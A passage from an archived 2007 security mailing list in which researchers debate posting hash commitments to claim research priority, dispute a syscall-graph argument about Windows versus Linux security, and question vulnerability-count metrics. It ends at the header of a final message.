Ideal for modem and ISDN: http://www.gmx.net/de/go/smartsurfer From peter at ngssoftware.com Mon Feb 5 11:06:46 2007 From: peter at ngssoftware.com (Peter Winter-Smith) Date: Mon, 5 Feb 2007 08:06:46 -0800 Subject: [Dailydave] Some Sums References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> Message-ID: <00bb01c7493f$a71de4f0$dededede@peterdell> I put forward the theory that Halvar dreamt up those hashes and is now on a desperate hunt to find the data behind the hash - the hash is the answer, what was the question :-D -Peter ----- Original Message ----- From: "Dave Korn" To: "'Halvar Flake'" ; "'Dave Aitel'" ; Sent: Monday, February 05, 2007 6:37 AM Subject: Re: [Dailydave] Some Sums > On 05 February 2007 13:12, Halvar Flake wrote: > >> Hey all, >> >> for lack of a better place, I would like to post the following hash >> values: >> >> MD5Sum: >> 5e5ed3b92b2abbcc1adaa18cc0ca6aaf >> >> SHA1sum: >> FFECBE21E3EC93A5AC2B94889AD2967881398A9C >> >> Cheers, >> Halvar > > > I take it that's going to be the hash of some file or other data you're > going to produce for someone at sometime in the future? Couldn't you just > have used a ZK protocol and left us all out of it? ;-) If you're going to > use > our inboxes as substitutes for escrow/notarisation centres, you could > perhaps > tell us just a little bit more about what you're doing! > > > cheers, > DaveK > -- > Can't think of a witty .sigline today.... > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > --
From dave.korn at artimi.com Mon Feb 5 10:39:52 2007 From: dave.korn at artimi.com (Dave Korn) Date: Mon, 5 Feb 2007 15:39:52 -0000 Subject: [Dailydave] Some Sums In-Reply-To: <20070205152244.239350@gmx.net> References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> Message-ID: <029a01c7493b$e0be8970$2e08a8c0@CAM.ARTIMI.COM> On 05 February 2007 15:23, Halvar Flake wrote: > Hey all, > > apologies for having taken up space in your inboxes. Heh, NM.... I wasn't really upset, I just wanted to prod you to give out some clue :) > And where would one > find a similarly large group of professionals that could act as witness ? Normally I just go round up a bunch of homeless bums from the alleyway behind the pool-hall, but I suppose YMMV.... ;-) > What about a general, publically archived mailing list where > people can post hashes of results to follow up later ? Anyone who > has read the matasano blog recently (Ptacek/Rutkowska debate) would > tend to agree that we need something like this. > > If people actually follow up with the originals of their hashes a few > months (or a year) later, such a list might be hugely interesting.
Even > if they just follow up with "the contents of the document with xxx are > flawed, and I withdraw the hash". It would be interesting to see the amount that got followed up and the amount that got withdrawn. > Anyhow, apologies for wasting your disk space - I will look for a better > forum in the future. Full-disclosure maybe ? It seems to be a > widely-archived write-only-medium anyhow. How about Usenet? Google groups appears to have alt.test archived all the way back to 1987! (And alt.anonymous.messages back to 1994, and that's a fairly good place to post incomprehensible strings of gibberish. No, wait a minute, pretty much the whole of alt.* is full of incomprehensible strings of gibberish....!) cheers, DaveK -- Can't think of a witty .sigline today.... From joanna at invisiblethings.org Mon Feb 5 12:51:43 2007 From: joanna at invisiblethings.org (Joanna Rutkowska) Date: Mon, 05 Feb 2007 18:51:43 +0100 Subject: [Dailydave] IPv6, CANVAS, The Love. In-Reply-To: <45C24CE8.10401@immunityinc.com> References: <45C24CE8.10401@immunityinc.com> Message-ID: <45C76EAF.8070101@invisiblethings.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dave Aitel wrote: > > A screenshot of CANVAS 6.19 attacking over IPv6 from Linux. > http://www.immunityinc.com/images/ipv6.png > So, now, when I apparently take part in the "CANVAS Advertising Campaign", shouldn't I be eligible for a free CANVAS Professional? ;) joanna. -----BEGIN PGP SIGNATURE----- iD8DBQFFx26uORdkotfEW84RAngvAJ9WU7Hpe0BLEJRT7nh3G7y7w2l8MwCgh0bd 9IzSaYh40AmiNrTmFf3IeQA= =PzEv -----END PGP SIGNATURE----- From joanna at invisiblethings.org Mon Feb 5 14:03:00 2007 From: joanna at invisiblethings.org (Joanna Rutkowska) Date: Mon, 05 Feb 2007 20:03:00 +0100 Subject: [Dailydave] IPv6, CANVAS, The Love. 
In-Reply-To: References: <45C24CE8.10401@immunityinc.com> <45C76EAF.8070101@invisiblethings.org> Message-ID: <45C77F64.10703@invisiblethings.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 David Maynor wrote: > Does this mean we can look forward to bluepill like shellcode being > included in CANVAS? > oh, I thought they already have it, no? but actually you will never know, cause it's 100% undetectable ;)) j. -----BEGIN PGP SIGNATURE----- iD8DBQFFx39jORdkotfEW84RAm2RAKC0jH+f4OF0l3dq69t3P6szDDqwFgCfWig9 QwVadeJQB5HA7O6PZFnndHs= =GS27 -----END PGP SIGNATURE----- From joanna at invisiblethings.org Mon Feb 5 14:44:04 2007 From: joanna at invisiblethings.org (Joanna Rutkowska) Date: Mon, 05 Feb 2007 20:44:04 +0100 Subject: [Dailydave] Some Sums In-Reply-To: <20070205152244.239350@gmx.net> References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> Message-ID: <45C78904.5060905@invisiblethings.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Halvar Flake wrote: > I admit that strictly speaking I have abused DD with the last mail. > What about a general, publically archived mailing list where > people can post hashes of results to follow up later ? Anyone who > has read the matasano blog recently (Ptacek/Rutkowska debate) would > tend to agree that we need something like this. > And what would that change, really, if I posted today a hash of our (because now, there's also Alex and Edgar working on Blue Pill) recent achievements in Blue Pill development (e.g. generic ways to resist direct timing analysis using trusted external clocks)? Ok, true, we're planning to give a presentation later this year on this subject and that would be cool if nobody else gave something similar before us, but does that mean we should "buy an insurance" today for "being the first"? Sure, it's cool to be the first person who publicly presents something. And all the press spotlight is cool too. 
But at some point, we can easily get into the absurd, I think... If somebody else gave a similar presentation before me, I could only use it as an argument to support my thesis (in this very example, that CPU vendors should provide a documented way to detect the presence of h/w hypervisors). I'm not judging Halvar, who I consider to be a great researcher, but it's almost a new trend now - Tom Ptacek published some mysterious hash in order to convince mankind that it should not be worried about hardware virtualization malware, now Halvar, who's next? And what's the real goal? To show off that "I'm better than others"? Or am I missing something? BTW, as both MD5 and SHA1 are considered broken these days, I wonder how difficult it would be to prepare some other file matching Halvar's or Tom's signatures? How about we start a little contest? I will buy a dinner for the first person (at a conference that we both attend) who creates a document matching Tom Ptacek's hash, which is here: http://www.matasano.com/log/680/detecting-virtualized-rootkits/ (the way of creating a matching file should be documented) I assume it would be easier to break Tom's hash as he only posted SHA1, while Halvar, apparently anticipating something, published both SHA1 and MD5. joanna. -----BEGIN PGP SIGNATURE----- iD8DBQFFx4kDORdkotfEW84RAjuEAKDgwvMP6yRxelMQFW01VnGp5NiRJgCg5j8F 8SnNprRjcx9XuDNROHwyQOc= =/HEp -----END PGP SIGNATURE----- From dave at immunityinc.com Tue Feb 6 19:57:07 2007 From: dave at immunityinc.com (Dave Aitel) Date: Tue, 06 Feb 2007 19:57:07 -0500 Subject: [Dailydave] Graphing: Don't believe everything you see. Message-ID: <45C923E3.4070509@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Graphs can be quite misleading. They make people think they see something which is blindingly obvious, but totally wrong. http://blogs.zdnet.com/threatchaos/?p=311 (Check out the pictures.) """ Windows is inherently harder to secure than Linux. There I said it. The simple truth.
Many millions of words have been written and said on this topic. I have a couple of pictures. The basic argument goes like this. In its long evolution, Windows has grown so complicated that it is harder to secure. Well these images make the point very well. Both images are a complete map of the system calls that occur when a web server serves up a single page of html with a single picture. The same page and picture. A system call is an opportunity to address memory. A hacker investigates each memory access to see if it is vulnerable to a buffer overflow attack. The developer must do QA on each of these entry points. The more system calls, the greater potential for vulnerability, the more effort needed to create secure applications. """ As soon as I saw those pictures, I was like "Hey, Sana Security guys spend hours staring at this stuff" and lo and behold, that's where they come from. The more system calls, the harder to secure with Sana's particular flavor of HIDS. But not "the greater potential for vulnerability". You don't get to see the syscall names here, but there are a few large segments of IIS that you don't get to see anywhere in Apache, as follows (I've read the source code for both, so bear with me): 1. The metabase - essentially a registry of configuration data that works on a per-directory or per-page basis. This is rather complex stuff, requiring MSRPC calls and all sorts of craziness. But it doesn't necessarily add to the insecurity of the product. 2. Threading and impersonation. My bet is that the syscall graph he generated for Apache was in forking mode. No need to thread or handle asynchronous operations at all. Just read(data); handle(data). Complexity only correlates with insecurity; it doesn't let you make order-of-magnitude judgment calls. Especially not based on graphs like that. For the record, or at least, as a reminder to the record, anything based solely on system call ordering is going to have a bugger of a time dealing with CreateThread().
On Windows you might be better off ignoring system call ordering entirely and dealing only with system call arguments. Having more system calls might make the entropy of the arguments of any one system call much smaller (ioctl() has very high argument entropy). Based on that, Windows might actually be MORE secure, just looked at from a different angle than the call graph he chooses to represent. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFySPitehAhL0gheoRAsRAAJ9gqIk9Hpt4AUYtsJ1WBopQnwfa+wCeM6Sm c/glQW/8rrtaeWlc9Nef3Xw= =qtzO -----END PGP SIGNATURE----- From felix-dailydave at fefe.de Tue Feb 6 21:58:54 2007 From: felix-dailydave at fefe.de (Felix von Leitner) Date: Wed, 7 Feb 2007 03:58:54 +0100 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <45C923E3.4070509@immunityinc.com> References: <45C923E3.4070509@immunityinc.com> Message-ID: <20070207025853.GA21338@codeblau.de> Thus spake Dave Aitel (dave at immunityinc.com): > Complexity only correlates with insecurity; it doesn't let you make > order-of-magnitude judgment calls. Especially not based on graphs like > that. Actually, an asynchronous webserver needs these syscalls to handle the two requests: GetQueuedCompletionStatus returns [socket+AcceptEx+CreateIoCompletionPort to queue the next request] CreateFile on the file to be served GetFileSize et al to get header data (optional) TransmitFile to send the response CloseFile to close the file ReadFile to read the second request GetQueuedCompletionStatus returns again CreateFile on the file to be served GetFileSize et al to get header data (optional) TransmitFile to send the response CloseFile to close the file closesocket That's it. No, really. Sprinkle in some VirtualAlloc and friends for malloc and free, but that's it. So if you see a graph in fine print about how a couple hundred syscalls are being called by a web server, that's a pretty good indicator that there's something wrong with it. 
Keep things simple. That said: this particular troll is from mid-2006 and has been on Slashdot back then, too. There is no reason to get worked up about it now. Felix PS: Apache is a bloated pig. People use it because so many other people are using it, not because there are any actual rational reasons to use it. IIS is a pig, too. People use it because it comes with Windows, and because it cheats (so it's faster than a pure user space web server can be). From druid at caughq.org Tue Feb 6 23:31:35 2007 From: druid at caughq.org (I)ruid) Date: Tue, 06 Feb 2007 22:31:35 -0600 Subject: [Dailydave] Not the dead "Vista speach recognition" thread (: In-Reply-To: <20070131155623.4235F1BF94B@absinthe.tinho.net> References: <20070131155623.4235F1BF94B@absinthe.tinho.net> Message-ID: <1170822695.20989.1.camel@localhost> On Wed, 2007-01-31 at 10:56 -0500, dan at geer.org wrote: > Next up: application to VoIP Almost right on cue, Skype begins promoting a 3rd party plug-in from Emotive Communications that provides a near-perfect attack vector: http://www.ringjacker.com/ It causes the called party to be "ringed" with caller-supplied ring-tone audio. More coverage here: http://voipsa.org/blog/2007/02/05/and-why-exactly-would-i-want-to-install-ringjacker-and-let-other-people-hijack-my-inbound-ringtone/ -- I)ruid, C?ISSP druid at caughq.org http://druid.caughq.org -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20070206/f85ab990/attachment-0001.pgp From george_ou at lanarchitect.net Wed Feb 7 01:27:38 2007 From: george_ou at lanarchitect.net (George Ou) Date: Tue, 6 Feb 2007 22:27:38 -0800 Subject: [Dailydave] Graphing: Don't believe everything you see. 
In-Reply-To: <45C923E3.4070509@immunityinc.com> References: <45C923E3.4070509@immunityinc.com> Message-ID: <005401c74a81$111d2db0$0c01a8c0@ecs400a> Ok this is really stupid. Why is it that Apache has so many more critical flaws than IIS 6.0 then? IIS 6.0 http://secunia.com/product/1438/?task=advisories Apache 2.0 http://secunia.com/product/73/?task=advisories Note that a lot of those Apache advisories are MULTIPLE exploits. Also note that Windows Server 2003 has had a fairly solid track record on security when you count the number of critical exploits over its lifetime compared to Linux. Take a look at Microsoft SQL 2005 and you'll see that's been ROCK SOLID with ZERO vulnerabilities. http://secunia.com/product/6782/?task=advisories Compare that to the mess of Oracle over the same time period. So let's not base our analysis on some stupid trumped up diagram and let's not make stupid generalizations about platforms. Let's try and be objective and factual. There are times one can bash Microsoft but this so called picture "analysis" just isn't one of them. George Ou -----Original Message----- From: dailydave-bounces at lists.immunitysec.com [mailto:dailydave-bounces at lists.immunitysec.com] On Behalf Of Dave Aitel Sent: Tuesday, February 06, 2007 4:57 PM To: dailydave at lists.immunitysec.com Subject: [Dailydave] Graphing: Don't believe everything you see. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Graphs can be quite misleading. They make people think they see something which is blindingly obvious, but totally wrong. http://blogs.zdnet.com/threatchaos/?p=311 (Check out the pictures.) """ Windows is inherently harder to secure than Linux. There I said it. The simple truth. Many millions of words have been written and said on this topic. I have a couple of pictures. The basic argument goes like this. In its long evolution, Windows has grown so complicated that it is harder to secure. Well these images make the point very well. 
Both images are a complete map of the system calls that occur when a web server serves up a single page of html with a single picture. The same page and picture. A system call is an opportunity to address memory. A hacker investigates each memory access to see if it is vulnerable to a buffer overflow attack. The developer must do QA on each of these entry points. The more system calls, the greater potential for vulnerability, the more effort needed to create secure applications. """ As soon as I saw those pictures, I was like "Hey, Sana Security guys spend hours staring at this stuff" and lo and behold, that's where they come from. The more system calls, the harder to secure with Sana's particular flavor of HIDS. But not "the greater potential for vulnerability". You don't get to see the syscall names here, but there's a few large segments of IIS you don't get to see anywhere in Apache are as follows (I've read the source code for both, so bear with me): 1. The metabase - essentially a registry of configuration data that works on a per-directory or per-page basis. This is rather complex stuff, requiring MSRPC calls and all sorts of craziness. But it doesn't necessarily add to the insecurity of the product. 2. Threading and impersonation. My bet is that the syscall graph he generated for Apache was in forking mode. No need to thread or handle asynchronous operations at all. Just read(data); handle(data). Complexity only correlates with insecurity; it doesn't let you make order-of-magnitude judgment calls. Especially not based on graphs like that. For the record, or at least, as a reminder to the record, anything based solely on system call ordering is going to have a bugger of a time dealing with CreateThread(). On Windows you might be better off ignoring system call ordering entirely and dealing only with system call arguments. 
Having more system calls might make the entropy of the arguments of any one system call much smaller (ioctl() has very high argument entropy). Based on that, Windows might actually be MORE secure, just looked at from a different angle than the call graph he chooses to represent. - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFySPitehAhL0gheoRAsRAAJ9gqIk9Hpt4AUYtsJ1WBopQnwfa+wCeM6Sm c/glQW/8rrtaeWlc9Nef3Xw= =qtzO -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave at lists.immunitysec.com http://lists.immunitysec.com/mailman/listinfo/dailydave From coley at mitre.org Wed Feb 7 02:11:16 2007 From: coley at mitre.org (Steven M. Christey) Date: Wed, 7 Feb 2007 02:11:16 -0500 (EST) Subject: [Dailydave] Some Sums Message-ID: <200702070711.l177BGJw026300@faron.mitre.org> > I take it that's going to be the hash of some file or other data > you're > going to produce for someone at sometime in the future? > Couldn't you just > have used a ZK protocol and left us all out of > it? ;-) If you're going to use > our inboxes as substitutes for > escrow/notarisation centres, you could perhaps > tell us just a > little bit more about what you're doing! MD5/SHA-1 crackability issues aside*, the next question that immediately comes to mind is why there isn't a central place for researchers to do exactly this - make a claim about knowledge that's provably fixed in a certain place and time. Oh, wait, we're all individuals and we don't need anybody else. There's no need to organize in any way, shape, or form. After all, when Ilfak posted that third-party patch, ABSOLUTELY EVERYBODY knew who he was and immediately trusted him, so why not Halvar? Sorry, I forgot about the outside world for a second. Snarkily and respectfully, Steve * crypto is my kryptonite, I defer to the geniuses. 
From dan at geer.org Wed Feb 7 02:35:38 2007 From: dan at geer.org (dan at geer.org) Date: Wed, 07 Feb 2007 02:35:38 -0500 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: Your message of "Wed, 07 Feb 2007 03:58:54 +0100." <20070207025853.GA21338@codeblau.de> Message-ID: <20070207073538.946E71BF9DA@absinthe.tinho.net> If anyone wants to argue about whether complexity and security are negatively correlated, then let's get to it. --dan, resisting burning bandwidth unasked From tqbf at matasano.com Wed Feb 7 08:54:10 2007 From: tqbf at matasano.com (Thomas Ptacek) Date: Wed, 7 Feb 2007 07:54:10 -0600 Subject: [Dailydave] Some Sums In-Reply-To: <45C78904.5060905@invisiblethings.org> References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> <45C78904.5060905@invisiblethings.org> Message-ID: <1df0a410702070554h54aa171bldb9c79b76a5d6353@mail.gmail.com> For those playing along with Joanna at home, use: d86ded8e6f086cbc86bb07d854e58e1d60680958 Which is SHA-1, untruncated, of the same file and a different nonce. The point of posting the hash is so that I can say we did something ("devised a battery of checks that detect hardware virtualization") and not have people think we simply made it up. On 2/5/07, Joanna Rutkowska wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Halvar Flake wrote: > > I admit that strictly speaking I have abused DD with the last mail. > > What about a general, publically archived mailing list where > > people can post hashes of results to follow up later ? Anyone who > > has read the matasano blog recently (Ptacek/Rutkowska debate) would > > tend to agree that we need something like this. > > > > And what would that change, really, if I posted today a hash of our > (because now, there's also Alex and Edgar working on Blue Pill) recent > achievements in Blue Pill development (e.g. 
generic ways to resist > direct timing analysis using trusted external clocks)? > > Ok, true, we're planning to give a presentation later this year on this > subject and that would be cool if nobody else gave something similar > before us, but does that mean we should "buy an insurance" today for > "being the first"? > > Sure, it's cool to be the first person who publicly presents something. > And all the press spotlight is cool too. But at some point, we can > easily get into absurd I think... > > If somebody else gave a similar presentation before me, I could only > used it as an argument to support my thesis (in this very example, that > CPU vendors should provide a documented way to detect the presence of > h/w hypervisors). > > I'm not judging Halvar, who I consider to be a great researcher, but > it's almost a new trend now - Tom Ptacek published some mysterious hash > in order to convince mankind that it should not be worried of hardware > virtualization malware, now Halvar, who's next? And what's the real > goal? To show off that "I'm better then others"? Or am I missing something? > > BTW, as both MD5 and SHA1 are considered broken these days, I wonder how > difficult would it be to prepare some other file matching Halvar's or > Tom's signatures? How about we start a little contest? I will buy a > dinner to the first person (at a conference that we both attend) who > creates a document matching Tom Ptacek's hash, which is here: > > http://www.matasano.com/log/680/detecting-virtualized-rootkits/ > > (the way of creating a matching file should be documented) > > I assume it would be easier to break Tom's hash as he only posted SHA1, > while Halvar, apparently anticipating something, published both SHA1 and > MD5. > > joanna. 
> -----BEGIN PGP SIGNATURE----- > > iD8DBQFFx4kDORdkotfEW84RAjuEAKDgwvMP6yRxelMQFW01VnGp5NiRJgCg5j8F > 8SnNprRjcx9XuDNROHwyQOc= > =/HEp > -----END PGP SIGNATURE----- > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > From robert at dyadsecurity.com Wed Feb 7 11:05:46 2007 From: robert at dyadsecurity.com (Robert E. Lee) Date: Wed, 07 Feb 2007 17:05:46 +0100 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <005401c74a81$111d2db0$0c01a8c0@ecs400a> References: <45C923E3.4070509@immunityinc.com> <005401c74a81$111d2db0$0c01a8c0@ecs400a> Message-ID: <45C9F8DA.4010808@dyadsecurity.com> George Ou wrote: > Take a look at Microsoft SQL 2005 and you'll see that's been ROCK SOLID with > ZERO vulnerabilities. > http://secunia.com/product/6782/?task=advisories > Compare that to the mess of Oracle over the same time period. > > So let's not base our analysis on some stupid trumped up diagram and let's > not make stupid generalizations about platforms. Let's try and be objective > and factual. In the spirit of "[silly] generalizations".... the number of vulnerabilities publicly disclosed for a product doesn't seem to be a valid metric for measuring security between products. There are different disclosure policies for every organization/product. Some applications are just going to get more attention than others. Closed source vs Open Source changes the methods available to an outside researcher for testing. For results to be compared, the same tests have to be run equally for both projects. Comparing the end result (vulnerability count) without taking into account how we got to the end result (testing methodology) reminds me a bit of: "If... she... weighs... the same as a duck,... she's made of wood. And therefore? A witch!!!" Cheers :), Robert -- Robert E. 
Lee Chief Information Officer http://www.dyadsecurity.com phone: +46-708-474-320 fax : +46-0455-13960 email: robert at dyadsecurity.com From dave at immunityinc.com Wed Feb 7 11:40:02 2007 From: dave at immunityinc.com (Dave Aitel) Date: Wed, 07 Feb 2007 11:40:02 -0500 Subject: [Dailydave] SILICA, hashes, etc Message-ID: <45CA00E2.30804@immunityinc.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 http://blogs.zdnet.com/security/?p=19 Check out the awesome pictures of Justine using Silica! It's like, hacking in action! I've been playing with mine a bit. There's just so many things you can do with something like this - it could really have 30 people developing stuff just for it. You end up dealing with a lot of interesting equipment. I've seen some truly weird CIFS servers, for example. One of our early adopters has a CISCO Leap network and I remember reading of a simple algorithmic crack for the authentication....has anyone tested it? Now I'm off to fix the reporting which I broke. :> - -dave This place after your signature is a good place for hashes. I'm not going to post any since it gives people a way to track the amount and timing of your research. But if you do like, less than 5 hashes a message, I don't see how anyone will care. And DD is archived on like 5 sites. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFygDftehAhL0gheoRAsmHAJ9yXjm9a4Qsrr8wbxdtr7ZaPSlxSwCcCL9U BgedMqtp/4EQbBdq45EJmjQ= =hKUx -----END PGP SIGNATURE----- From lmh at info-pull.com Wed Feb 7 13:15:39 2007 From: lmh at info-pull.com (LMH) Date: Wed, 7 Feb 2007 19:15:39 +0100 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <005401c74a81$111d2db0$0c01a8c0@ecs400a> References: <45C923E3.4070509@immunityinc.com> <005401c74a81$111d2db0$0c01a8c0@ecs400a> Message-ID: On 2/7/07, George Ou wrote: > Ok this is really stupid. Why is it that Apache has so many more critical > flaws than IIS 6.0 then? 
> > IIS 6.0 > http://secunia.com/product/1438/?task=advisories > > Apache 2.0 > http://secunia.com/product/73/?task=advisories > > Note that a lot of those Apache advisories are MULTIPLE exploits. http://secunia.com/product/4661/ lighttpd "just" has 3 known "advisories" released there. And well, running lighttpd on a production system and being concerned about security is pretty much like walking nude in a donkey farm, fully covered with pheromones. Any 'study' done upon known statistics is already a flawed assumption as a whole. Not that I'm doing propaganda for Apache. Given that nowadays people pretend to publicize mod_security and friends for improving the security of their 'web applications' the situation isn't really nice, for them. Cheers. From adam at homeport.org Wed Feb 7 13:39:26 2007 From: adam at homeport.org (Adam Shostack) Date: Wed, 7 Feb 2007 13:39:26 -0500 Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <20070207073538.946E71BF9DA@absinthe.tinho.net> References: <20070207025853.GA21338@codeblau.de> <20070207073538.946E71BF9DA@absinthe.tinho.net> Message-ID: <20070207183926.GA31790@homeport.org> Speaking for myself, I think there are much more interesting questions than looking at correlations between defects and complexity. For example, we could look at correlations between failures in the real world and training/education. The breach notices that Attrition is accumulating (http://attrition.org/dataloss) give us a set of real world failure data. That's something we've never really had. Now we can start mining it and learning things. For example, does the number of CISSPs employed by an organization correlate with the reports of failures compared to other similar orgs? Is that correlation positive or negative? Does "user education" have an effect? There's a huge amount of data in the attrition data set, and it all involves real pain that real organizations are feeling as they try to secure their data.
It's worth studying. Adam On Wed, Feb 07, 2007 at 02:35:38AM -0500, dan at geer.org wrote: | | If anyone wants to argue about whether complexity | and security are negatively correlated, then let's | get to it. | | --dan, resisting burning bandwidth unasked | | _______________________________________________ | Dailydave mailing list | Dailydave at lists.immunitysec.com | http://lists.immunitysec.com/mailman/listinfo/dailydave From jf at danglingpointers.net Wed Feb 7 22:03:05 2007 From: jf at danglingpointers.net (jf) Date: Thu, 8 Feb 2007 03:03:05 +0000 (UTC) Subject: [Dailydave] Graphing: Don't believe everything you see. In-Reply-To: <45C9F8DA.4010808@dyadsecurity.com> References: <45C923E3.4070509@immunityinc.com> <005401c74a81$111d2db0$0c01a8c0@ecs400a> <45C9F8DA.4010808@dyadsecurity.com> Message-ID: Really, almost all of these metrics are flawed - of the critical vulnerabilities listed many of them are things like a critical bug in OpenSSL, problems in the ftp proxy with IPv6 sockets, et cetera; which I guess depending on who you are, may or may not be critical, but to most of us who aren't using any type of proxy or IPv6 sockets, it's not so important. This is important to take into account when reviewing those number-of-critical-bugs comparisons. If we compare MS Office to OpenOffice in this light, it would show that OO is greatly superior in security to MS Office because of the number of critical flaws found, but I'd be willing to bet that many of us may not necessarily agree with that conjecture. The number of reported bugs is just that, and shouldn't be used as a metric to determine if a product is secure or not.
(However, when a bug is reported and then some time in the distant future another similar bug affecting the same region of code turns up, that does indicate a failure on the vendor's part to really care at all, which IMHO is a much better metric.)

Then we have things like 'time to patch' metrics, which are also flawed. For instance, does MS release patches for third-party products, or rather, if there is (yet another) bug in a CA product and MS doesn't patch it, do we count that against them? Why do we do that for Redhat? Maybe that isn't the best point as Redhat did indeed ship with a product, but where does responsibility lie? What if the bug is on the 'extras' CD in an unstable directory, do we count that? How about if it took organization Y several weeks to produce a patch for their product and then in less than Z hours the OS vendor provides the patch to their customers, do we count the time as 'several weeks' or Z hours?

That all said, because of different models, comparing time to patch for Windows to Linux/BSD/any of the OSs that are comprised mostly of third-party applications provides a false view of the situation.

As for the graphs, they provide an idea of the potential amount of bugs, but provide no real firm data. Speaking in a sense of probability of course. To declare however that one product is more secure than another simply based off of a graph like that is absurd and silly, and I think everyone realizes this.

-- 
Success is not final, failure is not fatal: it is the courage to continue that counts. -- Sir Winston Churchill

On Wed, 7 Feb 2007, Robert E. Lee wrote:

> Date: Wed, 07 Feb 2007 17:05:46 +0100
> From: Robert E. Lee
> To: dailydave at lists.immunitysec.com
> Subject: Re: [Dailydave] Graphing: Don't believe everything you see.
> 
> George Ou wrote:
> > Take a look at Microsoft SQL 2005 and you'll see that's been ROCK SOLID with
> > ZERO vulnerabilities.
> > http://secunia.com/product/6782/?task=advisories
> > Compare that to the mess of Oracle over the same time period.
> > 
> > So let's not base our analysis on some stupid trumped up diagram and let's
> > not make stupid generalizations about platforms. Let's try and be objective
> > and factual.
> 
> In the spirit of "[silly] generalizations".... the number of
> vulnerabilities publicly disclosed for a product doesn't seem to be a
> valid metric for measuring security between products. There are different
> disclosure policies for every organization/product. Some applications
> are just going to get more attention than others.
> 
> Closed source vs Open Source changes the methods available to an outside
> researcher for testing. For results to be compared, the same tests have
> to be run equally for both projects.
> 
> Comparing the end result (vulnerability count) without taking into account
> how we got to the end result (testing methodology) reminds me a bit of:
> 
> "If... she... weighs... the same as a duck,... she's made of wood. And
> therefore? A witch!!!"
> 
> Cheers :),
> 
> Robert

From dominique.brezinski at gmail.com Wed Feb 7 15:45:06 2007
From: dominique.brezinski at gmail.com (Dominique Brezinski)
Date: Wed, 7 Feb 2007 12:45:06 -0800
Subject: [Dailydave] Some Sums
In-Reply-To: <1df0a410702070554h54aa171bldb9c79b76a5d6353@mail.gmail.com>
References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> <45C78904.5060905@invisiblethings.org> <1df0a410702070554h54aa171bldb9c79b76a5d6353@mail.gmail.com>
Message-ID: <597760c90702071245u1b406f08q20f3c70cd08c732@mail.gmail.com>

On 2/7/07, Thomas Ptacek wrote:
> For those playing along with Joanna at home, use:
> 
> d86ded8e6f086cbc86bb07d854e58e1d60680958
> 
> Which is SHA-1, untruncated, of the same file and a different nonce.
> 
> The point of posting the hash is so that I can say we did something
> ("devised a battery of checks that detect hardware virtualization")
> and not have people think we simply made it up.

Tom and Halvar, why not go the extra step and sign the message? If you truly want a public record of first reference, it would seem a necessary step.

Dominique Brezinski

From cseagle at redshift.com Wed Feb 7 17:30:48 2007
From: cseagle at redshift.com (Chris Eagle)
Date: Wed, 7 Feb 2007 14:30:48 -0800
Subject: [Dailydave] Some Sums
In-Reply-To: <597760c90702071245u1b406f08q20f3c70cd08c732@mail.gmail.com>
References: <20070205131130.292040@gmx.net> <028e01c74933$32a6a410$2e08a8c0@CAM.ARTIMI.COM> <20070205152244.239350@gmx.net> <45C78904.5060905@invisiblethings.org> <1df0a410702070554h54aa171bldb9c79b76a5d6353@mail.gmail.com> <597760c90702071245u1b406f08q20f3c70cd08c732@mail.gmail.com>
Message-ID: <00a601c74b07$adfc8410$620510ac@ribeye>

########################################################
#
# This is a proof of posting certificate from
# stamper.itconsult.co.uk certifying that a user
# claiming to be:-
#     cseagle at redshift.com
# requested that this message be sent to:-
#     dailydave at lists.immunitysec.com
#
# This certificate was issued at 22:34 (GMT)
# on Wednesday 07 February 2007 with reference 0402578
#
# CAUTION: while the message may well be from the sender
#          indicated in the "From:" header, the sender
#          has NOT been authenticated by this service
#
# For information about the Stamper service see
#          http://www.itconsult.co.uk/stamper.htm
#
########################################################

Or people could choose to use a third party digital signing/timestamping service such as that offered above in order to submit hashes, real or otherwise, such as my quota of 5 below.
Chris

8b8851175db3f75f6cca226a71bc983ef507a1e8
421013a7981118f42837ab64546d6ba1fcd21d44
f80b4a15a0b3d6d3930c465bebd010bd99cb1f6a
b47a007951fd9ba8a494d84e09047a56f46ec844
bca6dc17e0373d5464bd1cc706d3156fb40ce7f2

Dominique Brezinski wrote:
>Tom and Halvar, why not go the extra step and sign the message? If you truly
>want a public record of first reference, it would seem a necessary step.

From cvoid at morphine.com Wed Feb 7 17:38:23 2007
From: cvoid at morphine.com (christian void)
